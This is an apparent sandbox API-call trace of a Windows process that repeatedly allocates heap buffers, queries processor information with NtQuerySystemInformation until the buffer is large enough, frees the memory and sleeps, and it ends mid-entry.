NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0290.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0290.672] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0290.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.673] Sleep (dwMilliseconds=0x110) [0290.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0290.688] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0290.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0290.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0290.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0290.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0290.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0290.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0290.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.691] Sleep (dwMilliseconds=0x110) [0290.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0290.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0290.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0290.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0290.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0290.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0290.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0290.707] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0290.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.708] Sleep (dwMilliseconds=0x110) [0290.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0290.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0290.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0290.722] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0290.722] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0290.722] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.723] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0290.723] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0290.723] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.723] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0290.723] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.724] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.724] Sleep (dwMilliseconds=0x110) [0290.731] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0290.731] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0290.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0290.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0290.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0290.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0290.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0290.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0290.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.734] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.734] Sleep (dwMilliseconds=0x110) [0290.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0290.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0290.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0290.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0290.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0290.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0290.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0290.754] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.755] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0290.755] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.755] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.755] Sleep (dwMilliseconds=0x110) [0290.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0290.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0290.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0290.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0290.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0290.769] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0290.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0290.769] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0290.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.770] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.770] Sleep (dwMilliseconds=0x110) [0290.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0290.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0290.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0290.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0290.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0290.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0290.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0290.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0290.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.785] Sleep (dwMilliseconds=0x110) [0290.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0290.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0290.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0290.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0290.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0290.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0290.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0290.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0290.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.801] Sleep (dwMilliseconds=0x110) [0290.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0290.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0290.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0290.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0290.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0290.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0290.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0290.815] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0290.815] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.816] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.816] Sleep (dwMilliseconds=0x110) [0290.826] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0290.826] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0290.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0290.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0290.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0290.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0290.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0290.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0290.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.829] Sleep (dwMilliseconds=0x110) [0290.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0290.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0290.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0290.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0290.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0290.847] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0290.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0290.847] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0290.848] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.848] Sleep (dwMilliseconds=0x110) [0290.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0290.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0290.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0290.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0290.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0290.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0290.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0290.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0290.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.863] Sleep (dwMilliseconds=0x110) [0290.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0290.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0290.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0290.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0290.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0290.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0290.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0290.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0290.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.879] Sleep (dwMilliseconds=0x110) [0290.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0290.891] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0290.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0290.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 